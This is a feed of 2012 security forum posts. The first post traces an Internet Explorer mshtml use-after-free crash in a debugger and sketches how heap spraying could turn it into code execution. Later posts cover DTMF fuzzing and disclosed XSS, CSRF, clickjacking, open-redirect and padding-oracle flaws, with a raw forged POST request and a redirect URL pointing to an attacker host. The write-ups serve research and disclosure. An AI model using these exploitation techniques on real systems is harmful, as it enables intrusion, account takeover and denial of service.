0:000> knL # ChildEBP RetAddr 00 0013b478 7d54f5c0 mshtml!CDispNode::GetDispRoot+0x12 01 0013b4bc 7d55118b mshtml!CDispNode::ReplaceNode+0xdb 02 0013b50c 7d50b3ad mshtml!CLayout::EnsureDispNodeCore+0x348 03 0013b5bc 7d688af4 mshtml!CLayout::EnsureDispNode+0x5a 04 0013b7f0 7d5b170b mshtml!CFlowLayout::CalcSizeCoreCSS1Strict+0x3ff 05 0013b808 7d50a136 mshtml!CFlowLayout::CalcSizeCore+0x2f 06 0013b840 7d5069d1 mshtml!CFlowLayout::CalcSizeVirtual+0x17e 07 0013b954 7d539257 mshtml!CLayout::CalcSize+0x224 08 0013b9c8 7d539def mshtml!CFlowLayout::MeasureSite+0x1e5 09 0013ba0c 7d539d26 mshtml!CFlowLayout::GetSiteWidth+0x12b 0a 0013ba38 7d6ca5e3 mshtml!CLSMeasurer::GetSiteWidth+0x80 0b 0013bb44 7d5befb2 mshtml!CRecalcLinePtr::AlignObjects+0x30b 0c 0013bbc4 7d5136e0 mshtml!CRecalcLinePtr::CalcAlignedSitesAtBOLCore+0x1d7 0d 0013bc14 7d514345 mshtml!CRecalcLinePtr::CalcAlignedSitesAtBOL+0xa9 0e 0013bcc8 7d5131cd mshtml!CRecalcLinePtr::MeasureLine+0x384 0f 0013c084 7d5114a5 mshtml!CDisplay::RecalcLinesWithMeasurer+0x502 10 0013c204 7d506252 mshtml!CDisplay::RecalcLines+0x67 11 0013c21c 7d506529 mshtml!CDisplay::RecalcView+0x6b 12 0013c2c4 7d689582 mshtml!CFlowLayout::CalcTextSize+0x2ee 13 0013c4fc 7d5b170b mshtml!CFlowLayout::CalcSizeCoreCSS1Strict+0xe8d

Disassembly of the crashed function:

Code:

mshtml!CDispNode::GetRootNode+0x6: 7d51f463 8b4808 mov ecx,dword ptr [eax+8] 7d51f466 85c9 test ecx,ecx 7d51f468 7404 je mshtml!CDispNode::GetRootNode+0xd (7d51f46e) 7d51f46a 8bc1 mov eax,ecx 7d51f46c ebf5 jmp mshtml!CDispNode::GetRootNode+0x6 (7d51f463) 7d51f46e c3 ret

The entire code flow is as follows.

Code:

mshtml!CDispNode::GetDispRoot: 7d51f437 8bff mov edi,edi 7d51f439 56 push esi 7d51f43a e822000000 call mshtml!CDispNode::GetRootNode (7d51f461) 7d51f43f 8bf0 mov esi,eax 7d51f441 85f6 test esi,esi 7d51f443 0f84c1020000 je mshtml!CDispNode::GetDispRoot+0x1d (7d51f70a) 7d51f449 8b06 mov eax,dword ptr [esi] 7d51f44b 8bce mov ecx,esi 7d51f44d ff5034 call dword ptr [eax+34h] 7d51f450 85c0 test eax,eax 7d51f452 0f84b2020000 je mshtml!CDispNode::GetDispRoot+0x1d (7d51f70a) 7d51f458 8bc6 mov eax,esi 7d51f45a 5e pop esi 7d51f45b c3 ret 7d51f45c 90 nop 7d51f45d 90 nop 7d51f45e 90 nop 7d51f45f 90 nop 7d51f460 90 nop mshtml!CDispNode::GetRootNode: 7d51f461 8bc1 mov eax,ecx 7d51f463 8b4808 mov ecx,dword ptr [eax+8] ds:0023:04cb4748=???????? 7d51f466 85c9 test ecx,ecx 7d51f468 7404 je mshtml!CDispNode::GetRootNode+0xd (7d51f46e) 7d51f46a 8bc1 mov eax,ecx 7d51f46c ebf5 jmp mshtml!CDispNode::GetRootNode+0x6 (7d51f463) 7d51f46e c3 ret

The C equivalent code:

PHP Code:

int __thiscall CElement__GetParentAncestorSafe(int this, int a2) {   int result; // eax@1   int v3; // ecx@1   int v4; // ecx@2   v3 = *(_DWORD *)(this + 16);   result = 0;   if ( v3 )   {     v4 = *(_DWORD *)(v3 + 4);     if ( v4 )     {       do       {         if ( *(_BYTE *)(v4 + 8) == a2 )           break;         v4 = *(_DWORD *)(v4 + 4);       }       while ( v4 );       if ( v4 )         result = *(_DWORD *)v4;     }   }   return result; } /(7D51F437) void *__thiscall CDispNode__GetDispRoot(void *this) {   void *v1; // eax@1   void *v2; // esi@1   void *result; // eax@3   v1 = CDispNode__GetRootNode(this);   v2 = v1;   if ( v1 && (*(int (__thiscall **)(_DWORD))(*(_DWORD *)v1 + 52))(v1) )     result = v2;   else     result = 0;   return result; }

The program crashes due to a use after free issue.

Code:

>u 7d51f463 7d51f463 8b4808 mov ecx,dword ptr [eax+8]

Here EAX is pointer to an Object element and ECX to the vftable. Here the object pointed to by the Vftable is freed, and there by the memory location pointed by EAX.

Code:

0:000> d 04cb4748 04cb4748 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ???????????????? 04cb4758 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ???????????????? 04cb4768 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ???????????????? 04cb4778 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????

If you look at the next instructions , we notice the following .

Code:

7d51f466 85c9 test ecx,ecx 7d51f468 7404 je mshtml!CDispNode::GetRootNode+0xd (7d51f46e) 7d51f46a 8bc1 mov eax,ecx 7d51f46c ebf5 jmp mshtml!CDispNode::GetRootNode+0x6 (7d51f463) 7d51f46e c3 ret

The Pesudo Code:

Code:

ecx = dword ptr[ eax+8 ] if (ecx ==0): -7d51f46e: return(eax) to 7d51f43f [calling module] | | else: | loop() | |-> and at:7d51f43f { mov esi,eax <-- value of eax returned form the above function test esi,esi <-- if (esi) ==0 take jmp je mshtml!CDispNode::GetDispRoot+0x1d (7d51f70a) mov eax,dword ptr [esi] ds:0023:04ca1d40= <-- move to eax data pointed by esi mov ecx,esi <-- not usefull call dword ptr [eax+34h] <-- call adress pointed by eax+34h }

So if we can make { mov ecx,dword ptr [eax+8] }point to the heap such a way that EAX+8 contains [00000000] and EAX contains a adress we control , we would have code execution. We can initialize this area using heap spray.

What I did was arranged my HTML tags such a way that it would leave a lot of garbage values mainly null in the EAX pointed memory, and then the program would crash at the call instruction. This is never the right way of doing nor reliable, but it was working fine for me.

Now we could take control of the program here.

Code:

7d51f44d ff5034 call dword ptr [eax+34h]

Code:

(36c.440): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=00000000 ebx=01c53380 ecx=01c3e6e0 edx=000000a4 esi=01c3e6e0 edi=01c071f4 eip=7d51f44d esp=0013b478 ebp=0013b4bc iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202 mshtml!CDispNode::GetDispRoot+0x12: 7d51f44d ff5034 call dword ptr [eax+34h] ds:0023:00000034=???????? Missing image name, possible paged-out or corrupt data. Missing image name, possible paged-out or corrupt data.

Code:

mshtml!CDispNode::GetDispRoot: 7d51f437 8bff mov edi,edi 7d51f439 56 push esi 7d51f43a e822000000 call mshtml!CDispNode::GetRootNode (7d51f461) 7d51f43f 8bf0 mov esi,eax 7d51f441 85f6 test esi,esi 7d51f443 0f84c1020000 je mshtml!CDispNode::GetDispRoot+0x1d (7d51f70a) 7d51f449 8b06 mov eax,dword ptr [esi] 7d51f44b 8bce mov ecx,esi 7d51f44d ff5034 call dword ptr [eax+34h] ds:0023:00000034=???????? 7d51f450 85c0 test eax,eax 7d51f452 0f84b2020000 je mshtml!CDispNode::GetDispRoot+0x1d (7d51f70a)

7d51f449 8b06 mov eax,dword ptr [esi]

Move DWORD (a 32-bit/4-byte value) in memory location specified by ESI[01c3e6e0]-->"00000000" into register EAX, so EAX becomes [00000000]

7d51f44d ff5034 call dword ptr [eax+34h]

The crash is at a virtual Call with [Register + offset ] . The Vftable is in eax + offset[34h] the adress of function to be executed . In this case it would be 13th entry in the table. Now that it's pointing to [00000000] the program crashes.

We can take control of the program here and have code execution, for that we need to find the type of object that was freed and the no of bytes that was allocated . Knowing these details we would be able to build fake objects of that size using JS . So that a the call at 7d51f463 [eax+8] would land on our crafted Vftable object and return [00000000] and

Code:

7d51f463 8b4808 mov ecx,dword ptr [eax+8]

a call to

Code:

7d51f44d ff5034 call dword ptr [eax+34h]

Vftable+34h would make the program land on our shellcode.

There are couple of ways to exploit this a good reference would be this.

1) The double reference exploit

Requirements:

A controllable VFTable pointer.

Method:

Our own code is placed in the deallocated object or some where in the memory where we could point to via Vftable.

Then we replace the VFTable pointer by one which points to some memory
later we will use this as VFTable pointing back to where we put our code.

source:

2) The VFTable exploit

Requirements:

A controllable VFTable .
Method:
Our code is injected in the VFTable which is made to point to itself.

Depends:

This this achieved by the system allocation process.

The Lookaside exploit

Requirements:

A controllable heap allocation / heap deallocation cycle.

Method:

Since the system reallocates a freed memory , we craft the code in such a way that when reallocation takes place our injected code is used in the reallocation cycle.

Read More: http://www.blackhat.com/presentation...irov-apr19.pdf
Read in detail here a similar approach http://securityevaluators.com/files/.../isewoot08.pdf

For choosing an appropriate method for exploitation we need determine what all we control in the current scenario and understand more about the crash. We can either use the debugger for this purpose or reverse engineer the current code to figure out those details.

*Thanks to w3devil and Zarul for proof reading the doc

Cheers.

References on Heap :

A practical C storage class scope and memory allocation programming online training - C language references, working program examples, source code and memory related function library
Data segment - Wikipedia, the free encyclopedia
Memory segmentation - Wikipedia, the free encyclopedia
.bss - Wikipedia, the free encyclopedia
Memory Layout of C Programs - GeeksforGeeks | GeeksforGeeks
gperftools - Fast, multi-threaded malloc() and nifty performance analysis tools - Google Project Hosting
A Heap of Risk - The H Security: News and Features
http://x9090.blogspot.in/2010/03/tut...rial-from.html
http://en.wikibooks.org/wiki/C_Progr...Use_after_free
http://www.quora.com/Why-is-dynamic-...ory-allocation
http://eli.thegreenplace.net/2011/09...out-on-x86-64/

Exploitation References :
http://d0cs4vage.blogspot.in/2011/06...ugs-patch.html
http://www.phreedom.org/research/hea...feng-shui.html
http://securityevaluators.com/files/.../isewoot08.pdf
http://www.exploit-monday.com/2011_11_13_archive.html
www.blackhat.com/presentations/bh-usa-09/MCDONALD/BHUSA09-McDonald-WindowsHeap-PAPER.pdf
http://www.phreedom.org/research/hea...feng-shui.html
http://www.thegreycorner.com/2010/01...-internet.html
https://www.owasp.org/images/0/01/OW..._Heapspray.pdf
https://www.corelan.be/index.php/201...spray_8211_IE6
http://www.blackhat.com/presentation...07-afek-WP.pdf
http://www.blackhat.com/presentation...irov-apr19.pdf
http://www.exploit-monday.com/2011/0...r-free_07.html
http://www.vupen.com/blog/20120116.A...30_Part_II.php

Protection Mechanisms:
http://robert.ocallahan.org/2010/10/...-using_15.html

Max OSX 64 bit ROP Payloads.

fb1h2s — Sat, 27 Oct 2012 18:08:20 GMT

6 Months back I did a presentation on Mac OSX 64 bit ROP shellcodes at Null Monthly meet, where I took two different session explaining 64 bit architecture in detail and Mac OSX 64 Rop Shellcode. Today I was browsing through some old stuffs and came across the PPT I used back then. The slides only contains the first day's presentation and I can't find the second days PPT :rolleyes: .

Am sharing it over here. There is nothing new.

http://www.slideshare.net/RahulSasi2...sx-64ropchains

Cheers.

XSS threats on leading Indian mobile operators websites

prashant_uniyal — Mon, 22 Oct 2012 15:08:28 GMT

While passing by common websites, we had came across various security issues in them in the past. Be it a bug on Facebook, Flipkart or Indian Shopping sites, we have brought up many issues in the past and have responsibly disclosed them. This time while passing by few mobile operators website, we noticed Cross-site scripting a.k.a XSS, 2nd top on the OWASP top 10 list. These vulnerabilities can be noticed very easily and can be used by cyber crooks to execute malicious scripts on the website, and carry out stealth operations like phishing, scams etc.

The leading mobile operators whose websites we had uncovered are : Idea Cellular, Tata Communications and BSNL, India�s government backed telecom company. The two websites had persistent XSS and the third one a non-persistent. The following are some screen-shot of the websites where you can see scripts injected and iframe:

Well the response, as usual from the concerned authorities was dull or you can say nil! Still we waited for a long time frame and today are disclosing these threats. We hope these get patched as soon as possible. Users are advised to be aware while using such websites and should check for the legitimate emails from these websites, should check links closely before responding. One of the protection method is using Firefox with No-script add-on.

Fuzzing DTMF Detection Algorithms .

fb1h2s — Sat, 20 Oct 2012 20:25:26 GMT

My ekoparty.org [Argentina] and NU[Delhi] talk and also Ruxcon [Australia] and BlackHat [Abhudabi] which I could't make it .

What is this paper about:

Input validation attacks and memory corruption attacks are common, and the
criticality of finding a DOS attack on a service like HTTP is consider a lot critical
considering the attack surface and easiness of attack. Even if we could trigger an
exception in an Apache Web server and crash them, that would be a huge loss
for corporates and individuals hosting critical applications on these systems.

This paper is on DTMF input processing algorithms [DSP], that are often
embed into PBX, IVR, Telephone routers and other devices that process DTMF
input. PBX and IVR servers are often deployed for running Phone Banking App
Servers, Call Center Application and other systems that uses phone to interact
with them. If an attacker could trigger exception in DTMF processing algorithms, then they could crash the entire application server making a single phone call, causing the entire Phone banking in accessible, or no calls to the costumer service goes through. One such denial of Service could cause a lot of panic and the amount of damage would be pretty huge.

History of this research:

I did two presentations last year, one explaining security vulnerabilities in IVR applications , mainly explaining logic flaws in CXML|VXML codes , and was not specific to any IVR's. These issues were related to coding flaws in CXML|VXML so any buggy IVR applications|IVR servers would be affected by those issues.

You can view the research experiments here :
http://www.garage4hackers.com/blogs/...ations%5D-310/

Well for the VXML attacks , finding bugs the best option is source code auditing, else you will have to do a lot of trail and error to exploit these systems .So with out source code the success rate is very poor.
Most of the Test were done on Voxeo IVR , since it was easy to install and manage .

The second paper which we recently demonstrated in Ekoparty was in the Core DTMF processing algorithms and it's implementations, any application that process DTMF and could be interacted directly could possibly be vulnerable to these attacks.

So let me refer the first attack as VXML attacks and second one as DTMF attack.

And for DTMF attack, If the system handles DTMF tones and you can interact with it directly , you would be able to perform the below mention attacks on it.

Fuzzing DTMF Detection Algorithms:

Applications of DTMF:

There are a lot of application that we use in our day to day life that usese DTMF tones as input.
The following are few applications:

IVR :
Costumer Care Applications
Phone Banking Applications

PBX [Private Branch exchange]:
Telecom Systems
Voice Mails
VOIP

Conference Bridges:
Telephone Routers

Attachment 564

For example the following CXML code will enable support for DTMF inputs in an IVR application.
Extreme Docs

Code:

Input is Evil
The input to these application that we control is DTMF , and there got be a module that converts these tones back to it's numeric format. So if we could find bug in those modules then technically we would be remotely able to:

[Crash] Shut down Costumer Service Apps
Shut down a Phone Banking
Shut down a telephone router handling millions of calls.

And having this much power is priceless .

DTFM: Dual Tone Multi Frequency

Original Source : DTMF Explained

DTMF stands for Dual Tone - Multi Frequency and it is the basis for your telephone system. DTMF is actually the generic term for Touch-Tone (touch-tone is a registered trademark of ATT). Your touch-tone phone is technically a DTMF generator that produces DTMF tones as you press the buttons.

It's called [Dual Tone Multi] because it is a combination of multi frequency [2], a High and Low Frequency .

DTFM Generation and DTMF Detection

DTMF Generation:

When you press the digit 1 on the keypad, you generate the tones 1209 Hz and 697 Hz.

Pressing the digit 2 will generate the tones 1336 Hz and 697 Hz.

It take two tones to make a digit and the decoding equipment knows the difference between the 1209 Hz that would complete the digit 1, and a 1336 Hz that completes a digit 2.

Code:
So the following code would be how it's done, we will get back to this in the Fuzzing part later.

Code:

key = {'1','2','3','4','5','6','7','8','9','*','0','#'}; low_frequency = [697 770 852 941]; % Low frequency group high_frequency = [1209 1336 1477]; % High frequency group frequency_pair = []; for column=1:4, for row=1:3, frequency_pair = [ frequency_pair[lfg(column);hfg(row)] ]; end end frequency =8khz play frequency_pair

sampling frequency

Here are couple of implementation of a DTMF generato in PHP and Java:
PHP dtmf generator - Old Skool Phreaking - Binary Revolution Forums
http://aggemam.dk/scripts/dtmf.phps

So DTMF generation is fairly easy to understand and to code. Remember, all these tone genration were done using oscillators at hardware level, but these days u hardly see any hardware implementation and the bug we are referring to all are at software level.

DTMF Detection

The input signals need to be processed for the production of DTMF codes, there are around 320 samples presented as the
minimum duration of a DTMF signal defined by the ITU standard is 40 ms in frequency of 8ms [0.04 x 8000] = 320 samples.And from these the tones need to be detected.

The solution for this would be to use a Discrete-Time Fourier Transform. Detection could be done by using a bank of filters or using a bank of filters using DFT. In this Goertzel algorithm is the mostly used DTMF detection algorithm .It computes a sequence using DFT , 16 samples of DFT are computed for 16 tones.For the implementation ogf goertzel the following equations are necessary.

[Equation]

In the above equation we need to calculate the constant, k.
The value "k" determines the tone we are trying to detect and is given by:

Code:

K =N * fton/fs

Where: ftone = frequency of the tone.
fs = sampling frequency.
N is set to 205.
Now we can calculate the value of the coefficient 2cos(2**k/N).

[Content credits: Dr NaimDahnoum briston University ]

Pseudo Code:

Code:

standard_frequency =output_frequency/sample_rate; coeff = 2*cos(2pi*standard_frequency); for each sample, x[n], s= x[n] + coeff*s_prev -s_prev2; s_prev2 = s_prev; s_prev+ s; end power = S-prev2*s_prev2 + s_prev*s_prev - coeff*s_prev*s_prev2

A better read on the algorithm could be found here:
https://sites.google.com/site/hobbyd...dtmf-detection

DTMF Detection:

As u must have noticed there need to be a good amount of computation process that is undergone for detecting the tones. And aalmost all of the systems that detects DTMF have one or the other form of above algorithm embedded into it. Now that we know the algorithm and the input, it would be a just a matter of time to fuzz one such application.

Input is Evil:

Fuzzing What We Controll

1) The Frequency[ftone]
2) The Amplitude
3) Sample Rate [fs]
4) Sample Length
5) Sample Duration
6) Higher Frequency
7) Lower Frequency

The frequency is set to 8ms as per standards, but we can vary this +-1/2.
And our fuzzer work by varying these controlled values. The orginal code was written by Christian Schmidt. a DTMF generator , and we modified the code to build our fuzzer.

Code:

//samples per second $sample_rate = isset($sample_rate) ? intval($sample_rate) : 8000; //signal length in milliseconds $signal_length = isset($signal_length) ? intval($signal_length) : 100; //break between signals in milliseconds $break_length = isset($break_length) ? intval($break_length) : 100; //pause length in milliseconds - pause character is ',' $pause_length = isset($pause_length) ? intval($pause_length) : 500; //amplitude of wave file in the range 0-64 $amplitude = isset($amplitude) ? intval($amplitude) : 64;

Test Case 1:

The example video shows a huge amount of CPU usage by the detection program when attached to our Fuzzer . Note, the input is via the input audio source [mic].
We tested the fuzzer on the following program and the below video is of that one . http://www.phrack.org/issues.html?issue=50&id=13

And for some reason there was an issue with the audio :(

No image the many applications that has got am implementation of this algorithm , since we have a user controlled input I believe it would be fairly easy to attack these devices .

I have had a remote crash as well [not exploitable], the mod-security of this server is not allowing me to add code here, I will later make a GIT repo and add the Fuzzer there.
Cheers.

CXML/VXML Auditing for IVR Pentesters:

Fuzzing DTMF Detection Algorithm Nullcon Delhi:References
Video from Nullcon Delhi:

Dual-Tone Multi-Frequency (DTMF) Signal Detection - MATLAB & Simulink Example - MathWorks India
https://docs.google.com/viewer?a=v&q...VttTswK3G0Y5-w
Dual Tone Multi-Frequency (DTMF) Detection
PHP dtmf generator - Old Skool Phreaking - Binary Revolution Forums

Couple of DTMF Decoder codes for testing:
https://docs.google.com/viewer?a=v&p...OGY5NWJmYmYyZA
http://www.codeforge.com/article/77096
http://www.phrack.org/issues.html?issue=50&id=13

Attached Images

Twitter Translation Center CSRF (Change Badge and Notification Settings)

prakhar — Sat, 20 Oct 2012 05:46:08 GMT

On 28th September 2012, I found a Cross-Site Request Forgery vulnerability on http://translate.twttr.com which is the Twitter Translation Center.

While checking the service I landed up on the "Accounts Settings" page which looked like this.

So we've two options here, first one toggles the Twitter Badge setting on Twitter.com and second one toggles the badge related notification.

POST request which disables both the settings looks like this:

POST /user/update HTTP/1.1
Host: translate.twttr.com
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:16.0) Gecko/20100101 Firefox/16.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Proxy-Connection: keep-alive
Referer: http://translate.twttr.com/user/prakharprasad/settings
Cookie:
Content-Type: application/x-www-form-urlencoded
Content-Length: 175

utf8=%E2%9C%93&_method=put&
authenticity_token=B6PJGp2Hkm1zi6lVN%2FIueNd7QqlAh IfM5C1pht1MzE8%3D&
user%5Bid%5D=809244&user%5Bbadging_exempted%5D=0&u ser%5Breceive_badge_email%5D=0

Now in the POST content, parameters of our interest are authenticity_token which is the CSRF prevention token generated by Twitter, user[badging_exempted] and user[receive_badge_email] toggles the badge related settings, user[id] is the user id of user, in my case it was 809244 and is static.

So, normally to prevent CSRF on this page authenticity_token needs to be verified on server-side, right ? but this wasn't the situation when I checked it. The server allowed the form to be submitted without even checking the authenticity_token :confused: , which rendered it useless.So we had a CSRF here.

The final Proof-of-Concept code I sent to Twitter Security Team to demonstrate CSRF existence looked like this:

_jim of Twitter Security Team replied within 1 hour of my initial bug report which said the team is investigating the issue.On 16th October the issue was addressed and then onwards the authenticity_token gets checked on the server-side. Any modification to the token results in an error page which looks like this:

I'm very thankful to Twitter Team for putting my name along with other white-hats on "Security at Twitter" Page.

Conclusively I would thank _jim who kept me in sync while the issue was investigated and addressed.

Cheers to all Garage Members :cool:

Understanding Padding Oracle Attack - Attack on Encryption in CBC mode

sebas_phoenix — Tue, 09 Oct 2012 19:27:51 GMT

Before we begin , a few terminologies that we should be familiar with. An Oracle is just a theoritical black box in Cryptography which responds to queries that an Adversary sends. For Example , a random Oracle would select and send a truly random value from a uniform distribution for each query that the Adversary sends to it. Propery implemented Crypto primitives behave like random Oracles ie even though the attacker intercepts any number of ciphertexts, he wont be able to derive any information whatsoever about the plain text. CBC (Cipher Block Chaining) is a mode that is secure against a adversary that can launch a chosen plaintext attack. CPA(Chosen Plaintext Attack) is where you can query the oracle with plaintexts(two at a time) of your choice and the Oracle will return the ciphertexts of either one and still the attacker wont be able to predict as to which plaintext the ciphertext belongs to.

Take a look at the following image(thanks to Wikipedia):

Basically what it means is that, at first a IV also called the Initialization Vector is chosen from a random distribution and xor'ed with the Plain Text and then subject to the Encryption function 'E' and the resulting CipherText is used as the IV for the next PlainText block.

Writing it as equation,

Co=E(k,m^IV) where '^' refers to the xor operation. Now we can see xor a lot in cryptographic primitives, the reason for that is , when we xor a value from any distribution with another value from a uniform random distribution, then the resulting distribution is also a uniform random distribution. From above, message does not belong to a uniform distribution whereas an IV belongs a uniform distribution but the resulting "m ^ IV" belongs to a uniform distribution.

Take a look at the following image(thanks again to Wikipedia) for the decryption:

Writing it again as equation,

As we know, Co=E(k,m^IV)
Applying decryption wrt 'k' on both sides,we have

D(k,Co)=m^IV

xor with IV on both sides (note that "A" ^ "A" == 0), so we have

m=D(k,Co) ^ IV

One of the caveats to remember here is that, if we modify IV as IV' such that IV'=IV ^ G, then the resulting plaintext message 'm' also gets xor'ed by G. Keep this mind as we proceed.
Now let's discuss about the padding in CBC assuming we use AES for encryption. Note that AES block size is 16 bytes. So if we have a block that is not a multiple of block size, say "abcdefghij" which is of size 10 bytes, we need to pad it to 16 bytes. The padding scheme that is generally used is to pad all the remaining bytes with the number of bytes missing. so it will be "abcdefhjij" + 0x6 0x6 0x6 0x6 0x6 0x6 (Notice that 0x6 is different from '6' tats why i made it this way). On decryption, we will look at the last byte , in this case it is 0x6, remove 6 bytes starting from the last byte to get out original message without the pad. Naturally, if we have a block that is a multiple of blocksize, we need to add a dummy padding block ' 0x16' repeated 16 times. See the image below to understand the padding scheme.(thanks to GDS Blog) Notice that they are using 3-DES for the encryption so block size is 8 bytes.

So what is padding oracle ?
The vulnerability occurs because of the types of error that previous implementations of SSL/TLS returned to the user, one is if the pad is invalid, it returned a Invalid Pad Error, if the pad is valid but the CT is not valid then it returns a Invalid Message Error. The attacker can query the pad and completely decrypt the Plain text. The following images from GDS blog does a great job of explaining it.Thanks guys!

What we need to do is , take the last byte of the IV, xor it with a value (G ^ 0x1),then it means that the message also will get xored by (G ^ 0x1) [remember the caveat i told you to keep in mind] , so if the PT's last byte too happens to be 'G' which can take any value from 0-255(a byte's possible values) , then we get a valid pad, since 0x1 is a valid 1-byte pad. To get the previous byte of the plaintext, we take the correct value of the last byte of the plaintext (lets call it 'P') and xor it with 0x2, and xor the last but previous byte of the IV with 'G' xor 0x2 because a valid 2-byte padding is '0x2 0x2' ie we fix the last byte and bruteforce the last but before byte till we get a valid pad.

There is a programming assignment @ Coursera's crypto class which deals with Padding Oracles,http://crypto-class.appspot.com/po?e...7dbf7035d5eeb4 . Our goal is to decrypt the ciphertext, the first 16 bytes are the IV (no need to decrypt them ofcourse). Below is a program I wrote in Python (I am kinda new to python so excuse the sloppiness) that decrypts the first 16 bytes of the message, the rest you can do if you are interested. Basically, if the pad is valid then the server responds with a 404 HTTP Error, else it responds with a 403 HTTP Error

This is the following link to the code : http://pastebin.com/kcN5i4Ze Not able to post the code here . am getting a .htaccess error for some reason! Mods can you look up the issue.

[UPDATE] Fixed the attachment image! Sorry for the inconvenience

Comments are Welcome.

Best Regards and Peace

Linkedin's Clickjacking & Open Url Redirection Vulnerabilities

ajaysinghnegi — Tue, 09 Oct 2012 11:11:03 GMT

Originally Posted by ajaysinghnegi

# Vulnerability Title: Secondary Email Addition & Deletion Via Click Jacking in Linkedin
# Website Link: [Tried on Indian version]
# Found on: 06/08/2012
# Author: Ajay Singh Negi
# Version: [All language versions would be vulnerable]
# Tested on: [Indian version]
# Reported On: 07/08/2012
# Status: Fixed
# Patched On: 10/09/2012
# Public Release: 15/09/2012

Summary

A Clickjacking vulnerability existed on Linkedin that allowed an attacker to add or delete a secondary email and can also make existing secondary email as primary email by redressing the manage email page.

Details

Linkedin manage email page (a total of 1 page) was lacking X-FRAME-OPTIONS in Headers and Frame-busting javascript measures to prevent framing of the pages. So the manage email page could be redressed to 'click-jack' Linkedin users. Below I have mentioned the vulnerable Url and also attached the Proof of concept screenshots.

1. Click Jacking Vulnerable Url:
https://www.linkedin.com/settings/manage-email?goback=.nas_*1_*1_*1

Click Jacking Vulnerability POC Screenshots:

The redressed editor page with frame opacity set to 0 so it is invisible to the user. As the user drags the computer into the trash-bin and clicks the Go button, a new secondary email will be added into the Linkedin user's account.

With the frames opacity set to 0.5 you can clearly see the redressed page and all the background. The computer is actually a text area that contains the attacker's email address which is selected by default with the computer image(Using JavaScript), once the Linkedin user drags the computer he will actually drag the attackers email address into the add secondary email address area and when he will click the go button, the Linkedin user will actually click the redressed add email address button and the attackers email will be successfully added in the Linkedin users account.

Secondary email added successfully into the Linkedin users account.

No X-Frame-Options in servers response header.

Linkedin addressed the vulnerability by adding X-FRAME-OPTIONS in header field which is set to SAMEORIGIN on this page.

# Vulnerability Title: Open Url Redirection in Linkedin
# Website Link: [Tried on Indian version]
# Found on: 05/08/2012
# Author: Ajay Singh Negi
# Version: [All language versions would be vulnerable]
# Tested on: [Indian version]
# Reported On: 06/08/2012
# Status: Fixed
# Patched On: 07/09/2012
# Public Release: 15/09/2012

Summary

Open Url Redirection using which an attacker can redirect any Linkedin user to any malicious website. Below I have mentioned the vulnerable Url and also attached the Proof of concept video.

Original Open Url Redirection Vulnerable Url:

https://help.linkedin.com/app/utils/...om_auth%2Ftrue

Crafted Open Url Redirection Vulnerable Url:
https://help.linkedin.com/app/utils/log_error/et/0/ec/7/callback/http%3A%2F%2Fattacker.in

Open Url Redirection Vulnerability POC Video:

Special Thanks to AMol NAik, Sandeep Kamble and all G4H members.

Symantec.com subdomains Multiple XSS Vulnerabilities

prakhar — Thu, 27 Sep 2012 18:53:06 GMT

Around half dozen XSS vulnerabilities were found on three subdomains of Symantec Corp. by me

http://clientui-kb.symantec.com
http://sfdoccentral.symantec.com
http://engweb.symantec.com

All the reported vulnerabilities have been fixed by Symantec :cool:

Cheers to all G4H Members :) w00t